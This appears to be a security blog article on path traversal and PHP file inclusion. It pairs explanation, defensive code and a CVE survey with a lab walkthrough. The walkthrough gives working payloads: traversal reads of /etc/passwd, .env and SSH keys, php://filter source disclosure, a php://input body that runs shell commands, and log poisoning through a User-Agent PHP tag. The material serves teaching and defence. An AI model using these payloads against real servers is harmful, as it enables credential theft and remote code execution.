Path traversal is the second-oldest serious web vulnerability after SQL injection, catalogued as CWE-22 and parked inside the A01 Broken Access Control bucket of the OWASP Top 10. The basic shape, sticking ../ into a ?file= parameter to read /etc/passwd, looks dated enough that every junior pentester learns it on day one and assumes the class is solved. It is not. In PHP land, traversal is the front door to a chain that reads source, then writes source, then runs code, all from a single GET parameter and a forgiving php.ini.
This article is the deep dive companion to the web application security vulnerabilities taxonomy and a sibling to the SQL injection spoke. I cover the mechanism, the four exploit shapes that actually matter in 2026, a fully-working walkthrough against a Dockerised lab, the variants in non-PHP stacks, and the defences that hold up. Tool-level material lives in best LFI tools 2026.
What is path traversal?
Path traversal is a vulnerability in which user-supplied input is concatenated into a filesystem path that the application then opens, allowing the user to step outside the intended directory using relative-path segments like ../ and read files the developer never meant to expose. The most common payload, ../../../../etc/passwd, escapes a docroot or templates directory and lands on the Unix password file.
Three terms get used interchangeably and they are not the same:
- Path traversal (CWE-22). The generic class. Any time user input controls a filesystem path and
../can escape the intended root. - Local File Inclusion (LFI). A PHP-flavoured subclass where the path is passed to
include,require,include_once, orrequire_once. The file is not just read, it is interpreted as PHP. If the attacker can get PHP source onto the box (log poisoning, upload, wrapper), LFI turns into code execution. - Remote File Inclusion (RFI). The same sink, but the include path is a URL. Effectively extinct in modern PHP because
allow_url_includedefaults to Off, but it lives on in legacy configs and in CTF challenges.
OWASP places traversal under A01 Broken Access Control rather than as its own item, which understates how often I find it during code review. Verify against the OWASP Top 10 2021 listing yourself; the 2024 refresh is still in draft at the time of writing.
The canonical vulnerable PHP, two lines:
$page = $_GET['page'];
include($page);Hit it with ?page=pages/about.php and the application works as intended. Hit it with ?page=../../../../etc/passwd and the application reads /etc/passwd. There is no third interpretation; the parser is doing exactly what was written.
The four exploit shapes
Every traversal exploit I have shipped against a real engagement falls into one of four shapes. Three of them are PHP-specific and chain to RCE. The fourth is the cross-stack baseline.
Classic ../ traversal
The original shape. The application reads the file and serves the bytes. Useful for reading config, credentials, source (if the file is served raw rather than interpreted), application metadata, SSH keys if you are lucky and the web user has access.
GET /download?file=../../../../etc/passwd
GET /view?template=../../../../var/www/app/.env
GET /image?path=../../../../home/deploy/.ssh/id_rsa
The number of ../ segments is "as many as needed". A request that goes too high just lands at / and the filesystem ignores the surplus, so ../../../../../../../../etc/passwd works as well as the exact count. Lazy traversal payloads always over-shoot for that reason.
php://filter source disclosure
PHP ships a set of stream wrappers for include and the filesystem functions, and the php://filter wrapper accepts a chain of filters applied to the underlying file before it is read. The interesting filter is convert.base64-encode:
GET /view.php?page=php://filter/convert.base64-encode/resource=index
include() is handed a stream that base64-encodes the file index.php as it reads. Because the bytes coming out are no longer valid PHP source, the engine cannot parse them as code; it falls back to echoing them as if they were plain text, and the response contains a base64 blob. Decode it locally and you have the verbatim source. Repeat against every script you can guess (view, login, db, config, wp-config) and you walk away with the application source plus every credential hard-coded in it.
This shape works against sinks that the classic shape cannot defeat. The most common one is include($_GET['page'] . '.php'), where the appended .php blocks a literal /etc/passwd read but is happily consumed by the wrapper as part of the resource= argument.
php://input RCE
The php://input wrapper exposes the raw request body as a stream. include('php://input') reads the POST body and parses it as PHP. With allow_url_include=On enabled in php.ini, an unauthenticated attacker gets code execution from one GET parameter plus one POST body.
POST /view-raw.php?page=php://input
Body: <?php system($_GET[0]); ?>
The default value of allow_url_include is Off, and PHP has shipped that default since 5.2 (see the PHP runtime configuration reference). Production servers that have not been hand-tampered with are safe from this specific shape by default. The shape still appears in the wild because operators flip the setting on while debugging a legitimate use case, never flip it back, and leave the server in that state for years.
Log poisoning
Log poisoning is the fallback when allow_url_include is Off, php://input does not work, and you still want RCE. The idea is to write PHP source onto disk via a path the attacker controls, then include that file with a classic traversal.
The two reliable write surfaces are the Apache or nginx access log and the error log. Both record the User-Agent header verbatim. Send a request with a PHP tag as the user agent:
curl -A '<?php system($_GET[0]); ?>' http://target/
The access log now contains a real <?php block. Read it back with a traversal:
GET /view-raw.php?page=../../../../var/log/apache2/access.log&0=id
include() reaches the PHP tag inside the log file, parses it, and runs the system($_GET[0]) call with the attacker's chosen command. Variants of the same trick work against /var/log/apache2/error.log (poisoned via a 404 request whose URL contains PHP), /proc/self/environ on older kernels, the $HOME/.ssh/authorized_keys file when the web user happens to be the SSH user, and any session file the application writes to a known directory.
Log poisoning fails by default on modern Debian and Ubuntu because Apache writes access logs as 0640 root:adm and the www-data user is not in the adm group. Every "let the deploy user tail the logs from the debug dashboard" change to that ACL re-opens the chain. I have seen this exact misconfiguration in three different production environments in 2024 alone.
Why null bytes don't work anymore
Pre-2010 LFI tutorials lean heavily on the null-byte truncation trick: append %00 to the payload to terminate the C-level string before PHP could append the .php suffix, turning include($_GET['page'] . '.php') into a working classic traversal. That trick was killed by PHP 5.3.4, released on December 9, 2010, which added null-byte rejection in the core filename APIs (further extensions to the check across exec, system, move_uploaded_file, and related functions landed across the 5.6.x series in 2015). Any path containing a \0 byte now raises an error rather than being silently truncated.
Verify against the PHP 5.3.4 changelog yourself before relying on the date in your own writing.
Everything that followed in this article exists because the wrappers became the modern equivalent of the null byte. php://filter defeats the same suffix-append sink that %00 used to defeat, and it has no equivalent fix in the language because the wrapper is a legitimate feature.
Walk a working chain (lab)
For everything below, I am attacking the lfi-basic target from the techearl-labs companion repo. It is a small PHP 8.2 app with two intentionally-vulnerable include sinks side by side, deliberately configured with allow_url_include=On and display_errors=On. Boot it with:
docker compose up lfi-basicThe lab listens on http://localhost:8084. The two endpoints differ in one detail that drives every exploit decision below:
| Endpoint | Sink shape |
|---|---|
/view.php?page=pages/about | include($_GET['page'] . '.php'), .php is appended |
/view-raw.php?page=pages/about.php | include($_GET['page']), raw, no suffix |
1. Classic traversal against the raw sink
view-raw.php passes the parameter straight through. Plain ../ works:
curl 'http://localhost:8084/view-raw.php?page=../../../../etc/passwd'The response renders /etc/passwd inline inside the page panel. Files with no <?php opening tag are echoed by include(), which is why the password file comes back as plain text rather than being parsed.
The same payload against /view.php fails. The engine looks for /etc/passwd.php, finds nothing, and the warning surfaces in the response (because display_errors=On). The suffix is doing its only useful job.
2. php://filter source disclosure against the suffix sink
view.php appends .php, so the wrapper has to compose with the suffix:
curl 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'The wrapper opens pages/about.php (the appended .php rides along inside the resource= argument), pipes it through the base64 encoder, and the include echoes the encoded source. Pipe through base64 -d to recover the original:
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
| grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -dRepeat for resource=view, resource=view-raw, resource=shared/layout to pull every PHP source file the application ships. Source disclosure is the highest-value LFI outcome short of code execution because it hands you every other endpoint's sink shape and every hard-coded credential in one pass.
3. php://input RCE against the raw sink
The wrapper only matches the literal path php://input, so the attack runs against view-raw.php (no suffix). Against view.php, the appended .php produces php://input.php, which the wrapper does not recognise.
curl -X POST --data '<?php echo shell_exec("id"); ?>' \
'http://localhost:8084/view-raw.php?page=php://input'The response carries the output of id, something like uid=33(www-data) gid=33(www-data) .... Any PHP runs, not just shell_exec: file writes, reverse shells, persistent webshells dropped into the docroot, database egress, anything the www-data process can do inside the container.
4. Log poisoning against the raw sink
The chain has two steps. Inject a PHP tag into the access log via the User-Agent of any request:
curl -A '<?php system($_GET[0]); ?>' http://localhost:8084/Include the log via traversal, passing the command in ?0=:
curl 'http://localhost:8084/view-raw.php?page=../../../../var/log/apache2/access.log&0=id'The log contains thousands of bytes of unrelated request lines, but the moment the parser sees <?php system($_GET[0]); ?> it switches into PHP mode, runs the call, switches back to literal-output mode, and the response carries the command output along with the rest of the log.
The lab's Dockerfile deliberately adds www-data to the adm group so the 0640 root:adm access log is readable by PHP. Without that change the chain fails with permission-denied; with it, it succeeds. The misconfiguration mirrors what real "let the web app tail its own logs" deployments do.
Beyond PHP: traversal in other stacks
The PHP-specific shapes (php://filter, php://input, log-poisoning-via-include) do not port to other stacks because no other runtime evaluates included files as code. The classic traversal shape does. Every framework that constructs a path from user input is potentially vulnerable.
Node.js
The footgun is path.join and friends. path.join happily resolves .. segments and lets you escape the base directory:
app.get('/files/:name', (req, res) => {
const file = path.join('/var/www/uploads', req.params.name);
res.sendFile(file);
});GET /files/..%2F..%2F..%2Fetc%2Fpasswd resolves to /etc/passwd. The fix is path.resolve plus a prefix check, not path.join:
const base = path.resolve('/var/www/uploads');
const target = path.resolve(base, req.params.name);
if (!target.startsWith(base + path.sep)) return res.sendStatus(403);
res.sendFile(target);Express's static middleware blocks .. segments by default, but custom send handlers and any direct fs.readFile call with user input are at risk.
Java
The classic Java instance is the "zip slip" vulnerability disclosed by Snyk in 2018, where archive entries with ../ in the name escape the extraction directory:
File target = new File(destDir, entry.getName());
new FileOutputStream(target).write(...);A malicious archive entry named ../../../../etc/cron.d/pwn lands wherever the running user has write access. Fix:
File target = new File(destDir, entry.getName()).getCanonicalFile();
if (!target.toPath().startsWith(destDir.toPath())) {
throw new IOException("zip slip: " + entry.getName());
}getCanonicalFile() resolves .. segments and symlinks before the prefix check; getAbsoluteFile() does not, which is why the lazy fix loses.
.NET
Path.Combine is the equivalent of Node's path.join and has the same defect, except worse: if the second argument is an absolute path, Path.Combine discards the first argument entirely and returns the second. Path.Combine("/var/www/uploads", "/etc/passwd") returns /etc/passwd. The defence is Path.GetFullPath plus a prefix check, identical in shape to the Node.js pattern. Modern guidance on Microsoft Learn pushes Path.GetFullPath with an explicit base, which validates inputs as it resolves.
The class is the same across every stack. The interpreter changes, the syntax changes, the trust failure does not.
Modern defences
Resolve and prefix-check
The single most important defence is to resolve the requested path to its canonical form and then check it is inside the allowed directory. In PHP that is realpath:
$base = realpath(__DIR__ . '/pages');
$target = realpath($base . '/' . $_GET['page']);
if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
http_response_code(403);
exit('Forbidden');
}
include($target);realpath returns false for paths that do not exist, which closes the "file does not exist yet but the parent directory check passed" race window. The str_starts_with prefix check with the trailing separator stops the /srv/pages-evil/ versus /srv/pages/ confusion, where the legitimate base is a prefix of an attacker-controlled sibling directory.
Allow-list of known IDs
Better: do not let user input become a path at all. Map an opaque ID to a known file:
$pages = [
'about' => '/srv/app/pages/about.php',
'contact' => '/srv/app/pages/contact.php',
];
$key = $_GET['page'] ?? 'about';
if (!isset($pages[$key])) { http_response_code(404); exit; }
include($pages[$key]);This is the only design that is correct by construction. The user controls a key into a map, not a filesystem path. Adding a page is one line in the array, which is cheap enough that I reach for this pattern by default.
Disable dangerous PHP directives
allow_url_include = Off
allow_url_fopen = Off
open_basedir = /srv/app:/tmp
display_errors = Off
log_errors = Onallow_url_include=Off kills the php://input RCE chain outright. allow_url_fopen=Off removes the network-fetch shapes. open_basedir confines filesystem access to an allow-listed set of directories, blocking the traversal even if the application sink is broken. None of these defences cover php://filter against the local docroot, which is why they are layered with the prefix check, not a replacement for it.
Separate file-serving service
For applications that genuinely serve user-uploaded files, the strongest pattern is a separate microservice (or a CDN with signed URLs) that holds nothing but the upload bucket and serves files by content-addressed identifier. The application hands the user a signed URL pointing at the service; the service has no relationship to the application's filesystem and no traversal sink. This is how every mature SaaS handles user uploads at scale.
Chroot and container isolation
Running the web process inside a chroot or a container with a minimal filesystem means a successful traversal lands the attacker inside a sandbox with nothing valuable in it. A read of /etc/passwd returns the container's stub /etc/passwd, not the host's. Combine with read-only root, no shell binaries, and dropped capabilities (CAP_DAC_READ_SEARCH in particular) and even a chained RCE has very little to do.
Real-world incidents (CVE section)
Path traversal hits well-maintained software regularly. A representative sample, all verified against the public CVE record:
- CVE-2021-41773, Apache HTTP Server 2.4.49. Path traversal in URL handling, allowing requests to reach files outside the document root if directories were configured with
Require all granted. Disclosed and patched in October 2021. The fix in 2.4.50 was incomplete, leading to CVE-2021-42013 a week later that also extended the impact to RCE whenmod_cgiwas enabled. - CVE-2021-42013, Apache HTTP Server 2.4.49 and 2.4.50. The follow-up to 41773, exploitable via double-encoding of the traversal sequence. The Apache foundation rated it Critical for the RCE variant.
- CVE-2024-23897, Jenkins. Arbitrary file read via the built-in CLI command parser, which expanded
@filenamearguments. Disclosed January 2024. Without Overall/Read permission, attackers could read the first three lines of any file readable by the Jenkins controller; with Overall/Read, the full file contents. Real exploitation chained the file-read into SSH key disclosure and lateral movement. - CVE-2023-2825, GitLab CE/EE. Path traversal in the file upload handler, allowing an unauthenticated user to read arbitrary files from the GitLab server when an attachment was in a public project nested deep enough. Disclosed May 2023 (NVD published 2023-05-26), affecting GitLab CE/EE 16.0.0 only; GitLab released 16.0.1 shortly after.
- CVE-2019-19781, Citrix ADC and Gateway. Path traversal in the Citrix VPN appliance reaching a Perl template that the attacker could write to, chaining traversal into unauthenticated RCE. The 2019 disclosure landed without a patch for ten days and was mass-exploited.
Every one of these landed in software with security teams, code review, and bug-bounty programs. Path traversal is not a museum piece.
Where to go next
- The best LFI tools for 2026 listicle for the practical tool comparison.
- The SQL injection deep dive for the sibling spoke in the same security cluster.
- The web application security vulnerabilities taxonomy for the full map.
Path traversal is the cheapest serious vulnerability to introduce (two lines of PHP, one line of Node) and one of the cheaper ones to fix (one resolve plus one prefix check). The reason it survives is not that the fix is hard, it is that the sinks are scattered across the codebase and every "let the user pick a file" feature is a fresh chance to get it wrong. Treat every filesystem path that touches user input as untrusted, every time.
Sources
Authoritative references this article was fact-checked against.
- OWASP, Path Traversalowasp.org
- PHP, Supported protocols and wrappersphp.net
- PortSwigger, Directory traversalportswigger.net
- CWE-22: Improper Limitation of a Pathname to a Restricted Directorycwe.mitre.org
- PHP, allow_url_include directivephp.net





